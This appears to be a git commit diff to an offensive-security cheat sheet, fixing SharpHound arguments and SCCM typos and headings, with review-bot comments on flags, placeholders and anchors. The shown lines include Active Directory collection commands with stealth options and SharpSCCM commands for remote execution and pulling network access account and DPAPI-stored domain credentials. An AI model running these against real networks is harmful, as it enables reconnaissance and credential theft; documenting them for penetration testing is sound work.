SCCM typos + SharpHound new args
parent 1cee3b6738
commit 581fdf4f18
|
@ -23,7 +23,8 @@ Use the correct collector:
|
||||||
|
|
||||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
||||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
|
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
|
||||||
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
|
||||||
|
.\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp --prettyprint --randomfilenames --collectallproperties --throttle 10000 --jitter 23 --outputprefix internalallthething
|
||||||
```
|
```
|
||||||
* Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell
|
* Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell
|
||||||
```powershell
|
```powershell
|
||||||
|
|
|
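Review bot: The rewritten `-c All,GPOLocalGroup` line drops `--nosavecache` and `--encryptzip` in addition to renaming `--randomizefilenames` and `--prettyjson`, while the commit title only mentions new arguments. State in the commit message whether those two flags were removed deliberately. The two unchanged lines above still use `--JSONFolder` and lowercase `-c all`, while the updated line uses `--outputdirectory` and `-c All`; if all three examples are meant for the same SharpHound release, update them together. The literal `internalallthething` after `--outputprefix` would also read better as a placeholder such as `<Prefix>`, matching `<UserName>` and `<PathToFile>`.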
@ -10,7 +10,7 @@
|
||||||
|
|
||||||
* Using **SharpSCCM**
|
* Using **SharpSCCM**
|
||||||
```ps1
|
```ps1
|
||||||
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE>
|
.\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
|
||||||
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
|
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
|
||||||
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
|
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
|
||||||
```
|
```
|
||||||
|
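Review bot: The corrected `get devices` line still carries the placeholder `<SERVER8NAME>`, which looks like a typo for `<SERVER_NAME>` and belongs in this same typo pass. The line after it uses a different placeholder style (`<server> <sitecode>`) and positional arguments where this one uses `--server` and `--site-code`; check that both forms are valid for the same SharpSCCM version and align the placeholders.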
@ -81,13 +81,13 @@
|
||||||
|
|
||||||
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
|
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
|
||||||
|
|
||||||
Requirements:
|
**Requirements**:
|
||||||
|
|
||||||
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
|
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
|
||||||
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
|
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
|
||||||
* PXE-enabled distribution point
|
* PXE-enabled distribution point
|
||||||
|
|
||||||
Exploitation:
|
**Exploitation**:
|
||||||
|
|
||||||
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
|
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
|
||||||
```ps1
|
```ps1
|
||||||
|
@ -101,12 +101,12 @@ Exploitation:
|
||||||
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
|
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
|
||||||
|
|
||||||
|
|
||||||
Requirements:
|
**Requirements**:
|
||||||
|
|
||||||
* PKI certificates are not required for client authentication
|
* PKI certificates are not required for client authentication
|
||||||
* Domain accounts credential
|
* Domain accounts credential
|
||||||
|
|
||||||
Exploitation:
|
**Exploitation**:
|
||||||
|
|
||||||
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
|
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
|
||||||
|
|
||||||
|
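Review bot: In the Requirements list, the unchanged line `* Domain accounts credential` is ungrammatical and was missed by this pass; `* Domain account credentials` reads correctly. Since the hunk already touches the labels on either side of it, fix it here.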
@ -116,7 +116,7 @@ SharpSCCM get naa
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt
|
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs
|
||||||
|
|
||||||
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
|
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
|
||||||
|
|
||||||
|
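Review bot: The new `### CRED-3` heading drops "and decrypt", but the blockquote directly below it still describes the outcome as "plaintext domain credentials", so the title no longer names the step that turns DPAPI blobs into plaintext. Either keep the decrypt wording in the heading or say in the commit message why the shorter title is preferred.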
@ -158,7 +158,7 @@ From a remote machine.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt
|
### CRED-4 Extract legacy credentials stored as DPAPI blobs
|
||||||
|
|
||||||
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
|
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
|
||||||
|
|
||||||
|
@ -187,7 +187,7 @@ From a remote machine.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### CRED-5 Extract and decrypt the SC_UserAccount table from the site database
|
### CRED-5 Extract the SC_UserAccount table from the site database
|
||||||
|
|
||||||
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
|
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
|
||||||
|
|
||||||
|
|
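Review bot: Renaming the `### CRED-5` heading (and the `### CRED-3` and `### CRED-4` headings in the hunks above) changes the anchors generated from the heading text, so any table of contents entry or inbound link built from the old titles will stop resolving. Search the repository for links to the old heading text and update them in the same commit.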